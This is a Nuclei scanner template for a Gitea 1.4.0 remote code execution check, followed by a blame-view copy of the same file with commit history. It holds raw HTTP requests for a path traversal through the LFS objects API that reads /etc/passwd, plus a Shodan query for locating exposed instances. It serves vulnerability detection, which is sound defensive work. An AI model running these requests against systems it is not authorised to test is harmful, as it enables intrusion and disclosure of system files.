nuclei-templates/http/vulnerabilities/gitea/gitea-rce.yaml

id: gitea-rce

info:
  name: Gitea 1.4.0 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    Gitea 1.4.0 is vulnerable to remote code execution.
  reference:
    - https://www.exploit-db.com/exploits/44996
    - https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
  metadata:
    verified: true
    max-request: 3
    shodan-query: 'title:"Installation -  Gitea: Git with a cup of tea"'
  tags: gitea,rce,unauth,edb

http:
  - raw:
      - |
        GET /api/v1/repos/search?limit=1 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /{{repo}}.git/info/lfs/objects HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/vnd.git-lfs+json

        {
            "Oid": "....../../../etc/passwd",
            "Size": 1000000,
            "User" : "{{randstr}}",
            "Password" : "{{randstr}}",
            "Repo" : "{{randstr}}",
            "Authorization" : "{{randstr}}"
        }
      - |
        GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header_3
        words:
          - "application/octet-stream"

    extractors:
      - type: regex
        name: repo
        group: 1
        regex:
          - '"name":".*","full_name":"(.*)","description"'
        internal: true

# digest: 490a0046304402206bedfc95c5c775b9dab649e784921360bfcc0c684722fd67533e2def7e40cc7c0220665341d1ed01c8bdfa56d062fc988325a387a1fccda93d31db3dd809072ef49c:922c64590222798bb761d5b6d8e72950
templates added 2023-03-18 22:07:09 +00:00			`id: gitea-rce`

			`info:`
			`name: Gitea 1.4.0 - Remote Code Execution`
			`author: theamanrawat`
			`severity: critical`
			`description: \|`
			`Gitea 1.4.0 is vulnerable to remote code execution.`
			`reference:`
			`- https://www.exploit-db.com/exploits/44996`
			`- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py`
			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 3`
templates added 2023-03-18 22:07:09 +00:00			`shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'`
Auto Generated CVE annotations [Mon Mar 20 07:05:15 UTC 2023] :robot: 2023-03-20 07:05:15 +00:00			`tags: gitea,rce,unauth,edb`
templates added 2023-03-18 22:07:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
templates added 2023-03-18 22:07:09 +00:00			`- raw:`
			`- \|`
			`GET /api/v1/repos/search?limit=1 HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /{{repo}}.git/info/lfs/objects HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`
			`Accept: application/vnd.git-lfs+json`

			`{`
			`"Oid": "....../../../etc/passwd",`
			`"Size": 1000000,`
			`"User" : "{{randstr}}",`
			`"Password" : "{{randstr}}",`
			`"Repo" : "{{randstr}}",`
			`"Authorization" : "{{randstr}}"`
			`}`
			`- \|`
			`GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`part: body_3`
			`regex:`
			`- "root:.*:0:0:"`

			`- type: word`
			`part: header_3`
			`words:`
			`- "application/octet-stream"`

			`extractors:`
			`- type: regex`
			`name: repo`
			`group: 1`
			`regex:`
			`- '"name":".","full_name":"(.)","description"'`
			`internal: true`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a0046304402206bedfc95c5c775b9dab649e784921360bfcc0c684722fd67533e2def7e40cc7c0220665341d1ed01c8bdfa56d062fc988325a387a1fccda93d31db3dd809072ef49c:922c64590222798bb761d5b6d8e72950`